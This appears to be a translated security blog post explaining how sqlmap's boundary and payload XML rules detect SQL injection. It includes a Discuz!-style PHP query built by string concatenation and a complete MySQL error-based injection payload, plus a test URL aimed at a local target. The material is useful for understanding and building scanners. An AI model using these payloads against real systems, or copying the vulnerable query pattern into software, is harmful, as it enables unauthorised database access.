Cheetah Academy of Sciences, 9/11 15:31

0x00 Preface


When SQL injection comes up, the first tool that comes to mind is sqlmap, the open source tool for detecting and exploiting SQL injection. But how does sqlmap actually decide that a parameter is injectable? This post walks through its scan logic; once that logic is understood, the same rules can be reused to build a SQL injection scanner of your own.

0x01 SQL Scan Rules


sqlmap's scan rules live in its \xml folder: \xml\boundaries.xml holds the boundaries (the prefix/suffix pairs that close off the original query around a payload), and \xml\payloads\ holds the payloads, one file per injection technique.

Two formats need to be understood: the boundary file and the payload files.

Example:

<boundary>
    <level>1</level>
    <clause>1</clause>
    <where>1,2</where>
    <ptype>1</ptype>
    <prefix>'</prefix>
    <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
  1. The clause and where elements

    These two elements limit where a boundary may be used. A boundary is combined with a test only when the boundary's <where> values contain the test's <where> value and the boundary's <clause> values contain one of the test's <clause> values; only then does the pair produce a payload. (In sqlmap's payload documentation, where 1 means the payload is appended to the parameter's original value, 2 means the original value is first replaced by a random negative number, and 3 means the original value is replaced by the payload outright; clause 1 is the WHERE/HAVING clause, 2 is GROUP BY and 3 is ORDER BY.)

  2. The prefix and suffix elements

To see what these two do, start from a piece of vulnerable application code.

<?php
// Discuz!-style helper: $pid is concatenated straight into the query string,
// which is the injection point the boundary's prefix/suffix are built around.
function getattachtablebypid($pid) {
    $tableid = DB::result_first("SELECT tableid FROM ".DB::table('forum_attachment')." WHERE pid='$pid' LIMIT 1");
    return 'forum_attachment_'.($tableid >= 0 && $tableid < 10 ? intval($tableid) : 'unused');
}

If pid is set to ' AND 'test' = 'test, the concatenated query becomes:

SELECT tableid FROM ".DB::table('forum_attachment')." WHERE pid='' AND 'test' = 'test' LIMIT 1

The final concatenated statement is still syntactically valid. The test payload can therefore be placed between a prefix and a suffix so that the resulting SQL stays valid: the prefix closes off the open quote or parenthesis of the original statement, and the suffix ties the remainder of the original statement back on, so the payload in between is executed.

That covers the boundary file; the payload file is next.

<test>
    <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
    <stype>2</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,2,3</clause>
    <where>1</where>
    <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
    <request>
        <!-- These work as well as ELT(), but are longer
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
        -->
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>MySQL</dbms>
        <dbms_version>&gt;= 5.0</dbms_version>
    </details>
</test>

1. The title element

The title names the current test payload; from it you can read the injection technique and the target database type.

2. The stype element

This marks the injection technique: 1 is boolean-based blind and 2 is error-based (sqlmap also uses 3 for inline queries, 4 for stacked queries, 5 for time-based blind and 6 for UNION query).

3. The level element

Each test declares the level at which it is run. When scanning with sqlmap you choose the depth with --level: the default is 1 and the maximum is 5, and a level 5 scan runs far more tests against each parameter (more than 1000 by the author's estimate) than the default.

4. The clause and where elements

The <clause> and <where> elements of a test have the same meaning as the ones in a boundary.

5. The request/payload element

The <payload> under <request> is the SQL fragment actually tested and is the heart of sqlmap's scan logic. [RANDNUM] stands for a random number, and [DELIMITER_START] and [DELIMITER_STOP] for random marker strings. At scan time sqlmap fills in these placeholders, then joins the result with the boundary's prefix and suffix to form the test payload.

6. The details element

The <dbms> child names the database the payload applies to (MySQL in this example) and <dbms_version> the applicable version range.

7. The response element

The child node under <response> tells sqlmap how to verify this test:

    grep: error-based injection
    comparison: boolean-based blind injection
    time: time-based (delayed) injection
    union (with its char and columns children): UNION query injection

sqlmap's checkSqlInjection function branches on this node, and its value is the evidence used to decide whether injection exists. In the example above the grep value is [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]; sqlmap replaces [DELIMITER_START] and [DELIMITER_STOP] with the same marker values it used in the payload, then runs the regex over the returned page. If it matches, the parameter is judged injectable.

Note that string payloads are post-processed according to the target database; that code lives in the syntax.py script under \plugins\dbms\<database>\.

So the final payload is the test's <payload> wrapped in the matching boundary's <prefix> and <suffix>, i.e.:

    final payload = URL parameter + boundary.prefix + test.payload + boundary.suffix

0x02 Example


Take the boundary and the test shown above as an example.

The boundary's <where> is 1,2 and contains the test's <where> (1); the boundary's <clause> is 1 and is contained in the test's <clause> (1,2,3). The boundary and test therefore match. The test's payload is:

AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

sqlmap then substitutes [RANDNUM], [DELIMITER_START] and [DELIMITER_STOP]; the delimiters are hex-encoded so that the payload needs no extra quotes. With, say:

    [RANDNUM] = 2214
    [DELIMITER_START] = ~!  (0x7e21 after encoding)
    [DELIMITER_STOP]  = !~  (0x217e after encoding)

the generated payload looks like this:

' AND (SELECT 2214 FROM(SELECT COUNT(*),CONCAT(0x7e21,(SELECT (CASE WHEN (2214=2214) THEN 1 ELSE 0 END)),0x217e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'pujM'='pujM

Suppose the target http://127.0.0.1/search-result.php?keyword=&ad_id=3 concatenates ad_id into its query and prints MySQL errors on the page, so the duplicate-key error this payload provokes is visible:

Duplicate entry '~!1!~1' for key 'group_key'

Following the logic above, the final test URL is:

http://127.0.0.1/search-result.php?keyword=&ad_id=' AND (SELECT 2214 FROM(SELECT COUNT(*),CONCAT(0x7e21,(SELECT (ELT(2214=2214,1))),0x217e,FLOOR(RAND(0)*2))x FROM information_schema.CHARACTER_SETS GROUP BY x)a) AND 'YmRM'='YmRM

The response contains the error shown above. sqlmap now takes the regex from the test's <grep>:

<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>

substitutes the delimiters it used, giving ~!(?P<result>.*?)!~, and matches it against Duplicate entry '~!1!~1' for key 'group_key'. The captured result is 1, which confirms that the parameter is injectable.

0x03 Summary


Tracing sqlmap's scan logic shows how conventional SQL injection detection is actually implemented. Once you are familiar with its rule files you can adapt the payloads and boundaries to the situation at hand: adding payloads and boundaries extends sqlmap's own scan coverage, and the same rule files can drive a SQL injection scanner of your own.